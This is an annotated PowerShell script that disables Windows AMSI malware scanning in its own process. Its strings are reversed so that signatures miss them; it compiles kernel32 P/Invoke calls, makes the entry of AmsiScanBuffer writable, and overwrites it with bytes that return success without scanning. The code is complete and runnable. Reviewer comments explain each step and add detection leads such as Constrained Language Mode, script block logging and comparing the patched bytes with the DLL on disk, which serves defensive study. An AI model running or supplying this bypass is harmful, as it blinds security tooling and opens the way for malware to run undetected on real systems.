script-obfuscated.ps1
# NOTE(review): analyst comments only; every code line below is unchanged.
#
# Purpose: patch the entry point of AmsiScanBuffer inside the amsi.dll mapped
# into the current process so the function returns immediately, which stops
# AMSI content scanning for this process. All identifying strings are stored
# reversed and rebuilt at runtime, so literal matches on "amsi.dll" or
# "AmsiScanBuffer" in the script text do not fire.
#
# The here-string holds reversed C# source. Read backwards it declares a public
# class Win32 with kernel32 P/Invoke signatures for LoadLibrary, GetProcAddress
# and VirtualProtect. Nothing can be annotated inside the here-string: every
# character between @" and "@ is part of the source handed to the compiler.
$Apple = @"
}
;)tcetorPdlOlfpl tniu tuo ,tcetorPweNlf tniu ,eziSwd rtPtnIU ,sserddApl rtPtnI(tcetorPlautriV loob nretxe citats cilbup
])"23lenrek"(tropmIllD[
;)emaNcorp gnirts ,eludoMh rtPtnI(sserddAcorPteG rtPtnI nretxe citats cilbup
])"23lenrek"(tropmIllD[
;)eman gnirts(yrarbiLdaoL rtPtnI nretxe citats cilbup
])"23lenrek"(tropmIllD[
{ 23niW ssalc cilbup
;secivreSporetnI.emitnuR.metsyS gnisu
;metsyS gnisu
"@
# Reverse the character array in place and join it back into readable C# text.
$Apple = $Apple.ToCharArray();[array]::Reverse($Apple);$Apple = $Apple -join ""
# Compile the C# text and expose the [Win32] type to the session.
# Detection/mitigation: Add-Type is blocked under Constrained Language Mode, so
# a host held in that mode stops here. On Windows PowerShell this step usually
# appears as a csc.exe child process - confirm for the PowerShell version in use.
Add-Type $Apple
# "lld.isma" reversed is "amsi.dll".
$DllName = "lld.isma".ToCharArray();[array]::Reverse($DllName);$DllName = $DllName -join ""
# Obtain the module handle for amsi.dll via the kernel32 LoadLibrary import.
$DllAddr = [Win32]::LoadLibrary($DllName)
# "reffuBnacSismA" reversed is "AmsiScanBuffer".
$FuncName = "reffuBnacSismA".ToCharArray();[array]::Reverse($FuncName);$FuncName = $FuncName -join ""
# Resolve the in-process address of the export that will be overwritten.
$FuncAddr = [Win32]::GetProcAddress($DllAddr, $FuncName)
# $p receives the previous page protection through the out parameter.
$p = 0
# Request protection 0x40 (PAGE_EXECUTE_READWRITE) on 5 bytes at the function
# entry. No later call in this script restores the old protection, so the page
# is left writable and executable - an anomaly for a system DLL's code page
# that memory scanners can flag.
[Win32]::VirtualProtect($FuncAddr, [uint32]5, 0x40, [ref]$p)
# 31 C0 = xor eax, eax ; C3 = ret. The function then returns 0 (S_OK as an
# HRESULT) without performing a scan.
$Banana = [Byte[]] (0x31, 0xC0, 0xC3)
# Write the 3 patch bytes over the start of AmsiScanBuffer.
# Detection: compare the in-memory prologue of AmsiScanBuffer with the on-disk
# amsi.dll; Script Block Logging (event 4104) records this text, so hunt for the
# reversed literals "lld.isma" / "reffuBnacSismA" and for Add-Type combined with
# VirtualProtect and Marshal.Copy in one script block.
[System.Runtime.InteropServices.Marshal]::Copy($Banana, 0, $FuncAddr, $Banana.Length)